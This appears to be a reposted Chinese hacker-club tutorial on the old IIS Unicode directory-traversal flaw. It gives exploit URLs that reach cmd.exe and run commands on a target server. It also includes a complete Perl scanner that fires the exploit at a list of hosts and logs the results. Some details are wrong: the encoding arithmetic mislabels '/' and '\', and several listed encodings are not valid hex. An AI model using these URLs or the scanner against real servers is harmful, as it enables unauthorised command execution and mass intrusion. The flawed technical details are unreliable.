分享
 
 
 

unicode编码漏洞全攻略-1

王朝other·作者佚名  2006-01-08
窄屏简体版  字體: |||超大  

unicode编码漏洞全攻略-1

UNICODE编码漏洞全攻略-1

—————————————————————————————————

badboy 坏男孩俱乐部

这并不是什么权威教材,只适合菜鸟了解win9x、NT存在的不安全面,切莫

用此方法在国内做尝试,如果你偏要如此,那么由此引起的一切法律后果由

你自己负责。

本文只允许在网络任意转载,但须保留文章的完整性,如把本文作为经济目

的使用,或者未经本人许可进行印刷、光盘杂志、等出版性质的行为,本人

将保留侵权控告的权利。

—————————————————————————————————

2000年10月17日中联绿盟发布了以下的安全公告:

微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞

远程漏洞:是

本地漏洞:是

发布日期:2000年10月17日

更新日期:2000年10月17日

受影响的版本:

Microsoft IIS 5.0

+ Microsoft Windows NT 2000

Microsoft IIS 4.0

+ Microsoft Windows NT 4.0

+ Microsoft BackOffice 4.5

- Microsoft Windows NT 4.0

+ Microsoft BackOffice 4.0

- Microsoft Windows NT 4.0

不受影响的版本:

漏洞描述:

微软IIS 4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"

目录遍历的漏洞。

未经授权的用户可能利用IUSR_machinename账号的上下文空间访问任何已知

的文件。该账号在默认情况下属于Everyone 和Users组的成员,因此任何与

Web根目录在同一逻辑驱动器上的能被这些用户组访问的文件都能被删除,

修改或执行,就如同一个用户成功登陆所能完成的一样。

测试方法:(以下的程序或方法可能具有攻击性,如用于非法用途,后果自负!) http://target.computer/scripts/..%c1%1c../path/solo.txt

%c0%af = /

%c1%9c = 解决方案:

该漏洞补丁随微软安全公告MS00-057一起发布

(http://www.microsoft.com/technet/security/bulletin/ms00-057.asp)

可以从如下地址下载补丁:

IIS 4.0 http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp

IIS 5.0 http://www.microsoft.com/windows2000/downloads/critical/q269862/default.asp

—————————————————————————————————

(以上为原文)

—————————————————————————————————

该漏洞一发布后,紧接而来的是众多NT网络服务器惨遭黑手,可以说,到目

前为止,网络里仍存在此漏洞的NT服务器至少有30%,而这些站点的管理员

是白痴还是认为该漏洞不值得注意??看来是不曾被黑不落泪,NT站的管理

员们,看完以下的方法,你快点给你的NT服务器打补丁吧。

一、UNICODE漏洞的原理

此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,

台湾繁体中文也同样存在这样的漏洞。

中文版的WIN2000中,UNICODE编码 存在BUG,在UNICODE 编码中

%c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'

%c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'

在NT4中/编码为%c1%9c

在英文版里:

WIN2000英文版%c0%af

但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,

具体情况本人未做详细的证实:

%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af

%f0%80%80%af

%fc%80%80%80%80%af

或许是什么日文版、韩文版之类,win2000 Terminal版有兴趣的朋友可以试试。

二、UNICODE漏洞的检测

以下均以中文版WIN2K为例,如果是其他NT版本,按上面所述的编码替换以下代

码中的

%c1%1c

最简单的检测方法:

比如说有一IP地址为X.X.X.X的WIN2K主机,我们可以在地址栏输入

x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

如果存在此漏洞的话,我们便可以看到以下的内容:(例子假设SCRIPTS目录里

无文件)

Directory of C:\inetpub\scripts

2000-09-28 15 〈DIR〉 .

2000-09-28 15 〈DIR〉 ..

这是我们在很多经验交谈中常看到大家使用的方法,实际上我们也可以改为这样

127.0.0.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/r+dir

即r=c 这个字母的取代,在本文发表之前,网络里没有介绍过,

关于r这字母可以等效于c,我们可以通过cmd/?可以得到解释。

当然,如果目标主机的管理员把该目录删除掉,我们就无法看到了,但是还有

以下的目录是同样可以用来测试的。 http://x.x.x.x/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

运行后,我们可以看到

Directory of c:\program files\common files\system\msadc

2000-08-06 19 <DIR> .

2000-08-06 19 <DIR> ..

(以下内容略)

19 File(s) 1,233,840 bytes

2 Dir(s) 6,290,644,992 bytes free

如果漏洞和目录同时存在的话,你就可以在WEB页上看到相对应的目录里的一

切内容。这仅是对单一目标主机的漏洞检测,如果想对某一IP段上的NT主机做

UNICODE漏洞的检测,我们就需要使用类似以下的扫描软件。

以下的源码是外国黑客写的,当然就只扫描英文版的NT,要扫描中文版的,需要

做相应的修改。

#!/usr/bin/perl

#Root Shell Hackers

#piffy

#this is a quick scanner i threw together while supposedly doing homework in my room.

#it will go through a list of sites and check if it gives a directory listing for the new IIS hole

#it checks for both %c0%af and %c1%9c

#perhaps a public script to do some evil stuff with this exploit later... h0h0h0

#werd: all of rsh, 0x7f, hackweiser, rain forest puppy for researching the hole =]

use strict;

use LWP::UserAgent;

use HTTP::Request;

use HTTP::Response;

my $def = new LWP::UserAgent;

my @host;

print "root shell hackers\n";

print "iis cmd hole scanner\n";

print "coded by piffy\n";

print "\nWhat file contains the hosts: ";

chop (my $hosts=<STDIN> );

open(IN, $hosts) || die "\nCould not open $hosts: $!";

while (<IN> )

{

$host[$a] = $_;

chomp $host[$a];

$a++;

$b++;

}

close(IN);

$a = 0;

print "ph34r, scan started";

while ($a < $b)

{

my $url="http://$host[$a]/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ ";

my $request = new HTTP::Request('GET', $url);

my $response = $def->request($request);

if ($response->is_success) {

print $response->content;

open(OUT, ">>scaniis.log");

print OUT "\n$host[$a] : $response->content";

-close OUT;

} else {

print $response->error_as_HTML;

}

&second()

}

sub second() {

my $url2="http://$host[$a]/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\ ";

my $request = new HTTP::Request('GET', $url2);

my $response = $def->request($request);

if ($response->is_success) {

print $response->content;

open(OUT, ">>scaniis.log");

print OUT "\n$host[$a] : $response->content";

-close OUT;

} else {

print $response->error_as_HTML;

}

$a++;

}

——————————————————————————————————

以上的pl程序你可以在本机运行(当然需要安装PERL),也可以在远程的

服务器上运行。

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有